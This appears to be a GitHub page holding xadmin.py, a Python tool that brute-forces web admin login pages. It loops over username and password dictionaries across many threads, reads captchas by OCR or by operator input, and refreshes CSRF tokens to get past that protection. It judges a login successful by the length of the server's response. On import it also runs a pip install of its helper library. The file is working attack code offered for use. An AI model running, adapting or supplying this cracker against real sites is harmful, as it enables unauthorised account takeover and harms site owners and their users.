-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathxadmin.py
More file actions
304 lines (264 loc) · 11.8 KB
/
xadmin.py
File metadata and controls
304 lines (264 loc) · 11.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
import time
from exp10it import figlet2file
figlet2file("3xp10it",0,True)
time.sleep(1)
import os
import re
import sys
from concurrent import futures
os.system("pip3 install exp10it -U --no-cache")
from exp10it import CLIOutput
from exp10it import get_request
from exp10it import get_value_from_url
from exp10it import get_user_and_pass_form_from_html
from exp10it import get_yanzhengma_form_and_src_from_url
from exp10it import get_string_from_url_or_picfile
from exp10it import ModulePath
from exp10it import get_remain_time
from exp10it import get_http_domain_from_url
from exp10it import get_url_has_csrf_token
from exp10it import get_param_part_from_content
def get_csrf_token_value_from_html(html):
html=re.sub(r"<!--.*-->","",html)
param_part=get_param_part_from_content(html)
find_csrf_token=re.search(r"([^&?]*token[^=]*)=([^&]+)",param_part,re.I)
csrf_token_value=""
if find_csrf_token:
csrf_token_value=find_csrf_token.group(2)
return csrf_token_value
def crack_admin_login_url(
url,
user_dict_file=ModulePath + "dicts/user.txt",
pass_dict_file=ModulePath + "dicts/pass.txt",
yanzhengma_len=0):
# 这里的yanzhengma_len是要求的验证码长度,默认不设置,自动获得,根据不同情况人为设置不同值效果更好
# 爆破管理员后台登录url,尝试自动识别验证码,如果管理员登录页面没有验证码,加了任意验证码数据也可通过验证
import requests
figlet2file("cracking admin login url", 0, True)
print("cracking admin login url:%s" % url)
print("正在使用吃奶的劲爆破登录页面...")
def crack_admin_login_url_thread(url,username,password):
if get_flag[0] == 1:
return
try_time[0] += 1
if request_action=="GET":
final_request_url=form_action_url
final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
(user_form_name,username),final_request_url)
final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
(pass_form_name,password),final_request_url)
if has_yanzhengma[0]:
if need_only_get_one_yan_zheng_ma:
yanzhengma_value=only_one_yan_zheng_ma_value
else:
yanzhengma_value=get_one_valid_yangzhengma_from_src(yanzhengma_src)
final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
(yanzhengma_form_name,yanzhengma_value),final_request_url)
if has_csrf_token:
final_request_url=re.sub(r"%s=[^&]*" % csrf_token_name,current_csrf_token_part[0],final_request_url)
html=s.get(final_request_url).text
if has_csrf_token:
csrf_token_value=get_csrf_token_value_from_html(html)
current_csrf_token_part[0]=csrf_token_part+csrf_token_value
else:
#post request
param_part_value=form_action_url.split("^")[1]
param_list=param_part_value.split("&")
values={}
for eachP in param_list:
each_p_list=eachP.split("=")
eachparam_name=each_p_list[0]
eachparam_value=each_p_list[1]
if eachparam_name==user_form_name:
eachparam_value=username
if eachparam_name==pass_form_name:
eachparam_value=password
values[eachparam_name]=eachparam_value
if has_yanzhengma[0]:
if not need_only_get_one_yan_zheng_ma:
values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
else:
values[yanzhengma_form_name]=only_one_yan_zheng_ma_value
if has_csrf_token:
values[csrf_token_name]=re.search(r"[^=]+=(.*)",current_csrf_token_part[0]).group(1)
html = s.post(form_action_url.split("^")[0], values).text
if has_csrf_token:
csrf_token_value=get_csrf_token_value_from_html(html)
current_csrf_token_part[0]=csrf_token_part+csrf_token_value
USERNAME_PASSWORD = "(" + username + ":" + \
password + ")" + (52 - len(password)) * " "
# 每100次计算完成任务的平均速度
left_time = get_remain_time(
start[0],
biaoji_time[0],
remain_time[0],
100,
try_time[0],
sum[0])
remain_time[0] = left_time
sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
'%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
sys.stdout.flush()
if len(html) > logined_least_length:
# 认为登录成功
get_flag[0] = 1
end = time.time()
CLIOutput().good_print(
"congratulations!!! admin login url cracked succeed!!!", "red")
string = "cracked admin login url:%s username and password:(%s:%s)" % (
url, username, password)
CLIOutput().good_print(string, "red")
return_string[0]=string
print("you spend time:" + str(end - start[0]))
http_domain_value = get_http_domain_from_url(url)
# 经验证terminate()应该只能结束当前线程,不能达到结束所有线程
table_name_list = get_target_table_name_list(http_domain_value)
urls_table_name = http_domain_value.split(
"/")[-1].replace(".", "_") + "_urls"
return {'username': username, 'password': password}
def crack_admin_login_url_inside_func(url, username, pass_dict_file):
# urls和usernames是相同内容的列表
urls = []
usernames = []
# passwords是pass_dict_file文件对应的所有密码的集合的列表
passwords = []
i = 0
while 1:
if os.path.exists(pass_dict_file) is False:
print("please input your password dict:>", end=' ')
pass_dict_file = input()
if os.path.exists(pass_dict_file) is True:
break
else:
break
f = open(pass_dict_file, "r+")
for each in f:
urls.append(url)
usernames.append(username)
each = re.sub(r"(\s)$", "", each)
passwords.append(each)
i += 1
f.close()
sum[0] = usernames_num * i
if need_only_get_one_yan_zheng_ma or has_csrf_token:
max_workers=1
else:
max_workers=20
with futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(crack_admin_login_url_thread, urls, usernames, passwords)
def get_one_valid_yangzhengma_from_src(yanzhengma_url):
# 这里不用exp10it模块中打包好的get_request和post_request来发送request请求,因为要保留session在服务器需要
#yanzhengma = get_string_from_url_or_picfile(yanzhengma_src)
while 1:
import shutil
response = s.get(yanzhengma_url, stream=True)
with open('img.png', 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
del response
yanzhengma = get_string_from_url_or_picfile("img.png")
os.system("rm img.png")
time.sleep(3)
if re.search(r"[^a-zA-Z0-9]+", yanzhengma):
# time.sleep(3)
continue
elif re.search(r"\s", yanzhengma):
continue
elif yanzhengma == "":
continue
else:
if yanzhengma_len != 0:
if len(yanzhengma) != yanzhengma_len:
continue
# print(yanzhengma)
# print(len(yanzhengma))
break
return yanzhengma
a=get_request(url,by="selenium_phantom_jS")
get_result = get_user_and_pass_form_from_html(a['content'])
user_form_name = get_result['user_form_name']
pass_form_name = get_result['pass_form_name']
if user_form_name is None:
print("user_form_name is None")
return
if pass_form_name is None:
print("pass_form_name is None")
return
form_action_url = a['form_action_value']
#default request action=post
request_action="POST"
if a['has_form_action']:
if "^" not in a['form_action_value']:
request_action="GET"
else:
print("url is not a admin login url entry")
return
get_flag = [0]
return_string=[""]
try_time = [0]
sum = [0]
start = [0]
# 用来标记当前时间的"相对函数全局"变量
biaoji_time = [0]
# 用来标记当前剩余完成时间的"相对函数全局"变量
tmp = time.time()
remain_time = [tmp - tmp]
# current_username_password={}
has_yanzhengma = [False]
find_yanzhengma = get_yanzhengma_form_and_src_from_url(url)
if find_yanzhengma:
yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name']
yanzhengma_src = find_yanzhengma['yanzhengma_src']
has_yanzhengma = [True]
has_csrf_token=False
for_csrf_token=get_url_has_csrf_token(url)
if for_csrf_token['has_csrf_token']:
has_csrf_token=True
csrf_token_name=for_csrf_token['csrf_token_name']
csrf_token_part=csrf_token_name+"="
current_csrf_token_part=[""]
s = requests.session()
# sesssion start place
session_start=s.get(url)
unlogin_length = len(session_start.text)
# 如果post数据后返回数据长度超过未登录时的0.5倍则认为是登录成功
logined_least_length = unlogin_length + unlogin_length / 2
if has_csrf_token:
csrf_token_value=get_csrf_token_value_from_html(session_start.text)
current_csrf_token_part=[csrf_token_part+csrf_token_value]
need_only_get_one_yan_zheng_ma=False
if has_yanzhengma[0]:
if "^" in form_action_url:
#post request
print(get_value_from_url(form_action_url.split("^")[0])['y1'])
if get_value_from_url(form_action_url.split("^")[0])['y1']!=get_value_from_url(a['current_url'])['y1']:
# should update yanzhengma everytime
need_only_get_one_yan_zheng_ma=True
else:
#get request
if get_value_from_url(form_action_url)['y1']!=get_value_from_url(a['current_url'])['y1']:
need_only_get_one_yan_zheng_ma=True
if need_only_get_one_yan_zheng_ma:
print("Congratulation! Target login url need only one yanzhengma!!")
import shutil
response = s.get(yanzhengma_src, stream=True)
with open('img.png', 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
del response
only_one_yan_zheng_ma_value= input("Please open img.png and input the yanzhengma string:>")
#get_string_from_url_or_picfile("img.png")
os.system("rm img.png")
with open(r"%s" % user_dict_file, "r+") as user_file:
all_users = user_file.readlines()
usernames_num = len(all_users)
start[0] = time.time()
for username in all_users:
# 曾经双层多线程,没能跑完所有的组合,于是不再这里再开多线程
username = re.sub(r'(\s)$', '', username)
crack_admin_login_url_inside_func(a['current_url'], username, pass_dict_file)
return return_string[0]
if __name__ == '__main__':
import sys
url = sys.argv[1]
# 下面加4是因为http://localhost/admin.php中验证码为4,在不确定验证码长度情况下下面第二个参数不用写
# crack_admin_login_url(url,yanzhengma_len=4)
crack_admin_login_url(url)